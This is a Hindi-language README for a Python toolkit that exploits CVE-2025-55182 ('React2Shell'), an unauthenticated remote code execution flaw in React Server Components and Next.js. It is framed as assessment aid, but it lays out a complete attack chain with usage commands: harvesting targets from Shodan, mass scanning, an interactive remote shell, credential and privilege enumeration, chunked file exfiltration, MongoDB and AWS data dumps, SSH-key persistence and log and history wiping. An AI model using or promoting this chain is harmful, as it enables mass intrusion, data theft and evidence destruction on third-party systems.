
CVE-2025-55182 के लिए टूलकिट, जिसे React2Shell के नाम से भी जाना जाता है।
एक Python टूलकिट जो अधिकृत वातावरणों में CVE-2025-55182 (जिसे React2Shell के नाम से भी जाना जाता है) के सत्यापन और जाँच के लिए है। यह भेद्यता React Server Components को प्रभावित करती है और Next.js जैसे फ्रेमवर्क से निर्मित अनुप्रयोगों को अनप्रमाणित दूरस्थ कोड निष्पादन के लिए उजागर कर सकती है। टूलकिट लक्ष्य संग्रह, बल्क सत्यापन, एक इंटरैक्टिव परीक्षण शेल, होस्ट गणना और वैकल्पिक पोस्ट-सत्यापन उपयोगिताओं को जोड़ता है।
hosts_scanner.py बल्क पहचान के दौरान केवल एक निश्चित echo VULN_TEST मार्कर चलाता हैयह रिपॉजिटरी एक मूल्यांकन सहायता है, आधिकारिक सलाह की जाँच और विक्रेता पैच लागू करने का विकल्प नहीं है।
| टूल | उद्देश्य | आउटपुट या प्रभाव |
|---|---|---|
shodan_parser.py | प्रमाणित Shodan खोजों को क्वेरी सूची से खोलता है और सामान्यीकृत HTTP(S) उत्पत्ति एकत्र करता है। | अद्वितीय होस्ट को files/targets.txt में जोड़ता है। |
hosts_scanner.py | एक निश्चित VULN_TEST कमांड के साथ लक्ष्य सूची की समवर्ती जाँच करता है। | पुष्टि किए गए लक्ष्यों को files/vulnerable.txt और असफल लक्ष्यों को files/trash.txt में लिखता है। |
exploit.py | एक लक्ष्य का पुनः-सत्यापन करता है और एक इंटरैक्टिव कमांड सत्र प्रदान करता है। | टर्मिनल में दूरस्थ कमांड आउटपुट प्रिंट करता है। |
universal_scanner.py | सिस्टम, कंटेनर, नेटवर्क, फाइलसिस्टम, प्रक्रिया, क्रेडेंशियल-एक्सपोज़र और विशेषाधिकार-जोखिम जानकारी एकत्र करता है। | विस्तृत निष्कर्षों को scan_results.json में सहेजता है। |
infrastructure/universal_download.py | कमांड चैनल के माध्यम से फिर से शुरू करने योग्य Base64 चंकों में एक दूरस्थ फ़ाइल स्थानांतरित करता है। | एक स्थानीय फ़ाइल बनाता या फिर से शुरू करता है और उसके आकार की पुष्टि करता है। |
infrastructure/mongo_proxy.py | MongoDB इन्वेंट्री और सीमित नमूने के लिए सत्यापित होस्ट का उपयोग नेटवर्क पथ के रूप में करता है। | डेटाबेस, संग्रह, गणनाएँ और एक छोटा नमूना सूचीबद्ध करता है। |
infrastructure/mongo_dump.py | एक MongoDB डेटाबेस या सभी गैर-सिस्टम डेटाबेस को प्रति-संग्रह सीमा के साथ निर्यात करता है। | मूल्यांकित होस्ट पर /tmp के अंतर्गत एक JSON फ़ाइल बनाता है। |
infrastructure/aws_dump.py | एक ECS कार्य भूमिका के लिए उपलब्ध AWS संसाधनों की सूची बनाता है। | /tmp के अंतर्गत एक JSON फ़ाइल बनाता है; इसमें संवेदनशील मान शामिल हो सकते हैं। |
infrastructure/install_ssh_key.py | वर्तमान दूरस्थ उपयोगकर्ता के authorized_keys में एक सार्वजनिक कुंजी जोड़ता है। | दूरस्थ SSH कॉन्फ़िगरेशन को संशोधित करता है और स्थिरता स्थापित करता है। |
infrastructure/trace_cleaner.py | टूलकिट कलाकृतियों को हटाता है और इतिहास, कैश और लॉग को साफ़ करने का प्रयास करता है। | दूरस्थ फ़ाइलों को विनाशकारी रूप से संशोधित करता है; केवल स्वीकृत सफाई अभ्यास के दौरान उपयोग करें। |
RCE-निर्भर टूल्स को सामान्य शेल उपयोगिताओं वाले Linux-जैसे लक्ष्य की आवश्यकता होती है। कुछ बुनियादी ढाँचा सहायकों को अतिरिक्त रूप से मूल्यांकित होस्ट पर Node.js और प्रासंगिक npm पैकेजों के पहले से उपलब्ध होने की अपेक्षा होती है।
shodan_parser.py के लिए Playwright के माध्यम से स्थापित Chromiumpython -m venv .venv
पर्यावरण को सक्रिय करें:
# Linux या macOS
source .venv/bin/activate
# Windows PowerShell
.\.venv\Scripts\Activate.ps1
निर्भरताएँ स्थापित करें:
python -m pip install -r requirements.txt
python -m playwright install chromium
Shodan संग्रह के लिए, .env.example को .env में कॉपी करें और LOGIN और PASSWORD सेट करें। कभी भी .env को कमिट न करें।
files/queries.txt में एक पंक्ति में रखें, या अधिकृत लक्ष्यों को सीधे files/targets.txt में रखें।python shodan_parser.py के साथ लक्ष्य एकत्र करें।python hosts_scanner.py --file files/targets.txt --concurrency 50 --timeout 30
files/vulnerable.txt की समीक्षा करें और किसी भी कमांड-निष्पादन या बुनियादी ढाँचा उपयोगिता को चलाने से पहले मैन्युअल रूप से स्वामित्व और दायरे की पुष्टि करें।स्कैनर स्किप सूची को रीसेट करने के लिए:
python hosts_scanner.py --file files/targets.txt --clear-trash
python exploit.py https://target.example
python universal_scanner.py https://target.example
बुनियादी ढाँचा उपयोगिताएँ:
python infrastructure/universal_download.py <TARGET> <REMOTE_PATH> [LOCAL_FILE] [CHUNK_SIZE]
python infrastructure/mongo_proxy.py <TARGET> <MONGODB_URI>
python infrastructure/mongo_dump.py <TARGET> <MONGODB_URI> <DATABASE|ALL> [OUTPUT_FILE] [LIMIT]
python infrastructure/aws_dump.py <TARGET> [OUTPUT_FILE]
python infrastructure/install_ssh_key.py <TARGET> [PUBLIC_KEY_PATH]
python infrastructure/trace_cleaner.py <TARGET>
प्रत्येक स्क्रिप्ट को बिना तर्कों के चलाकर उसकी पूर्ण कमांड-लाइन सहायता देखें।
bash, base64, dd और timeout जैसे उपकरणों की उपलब्धता मानती है।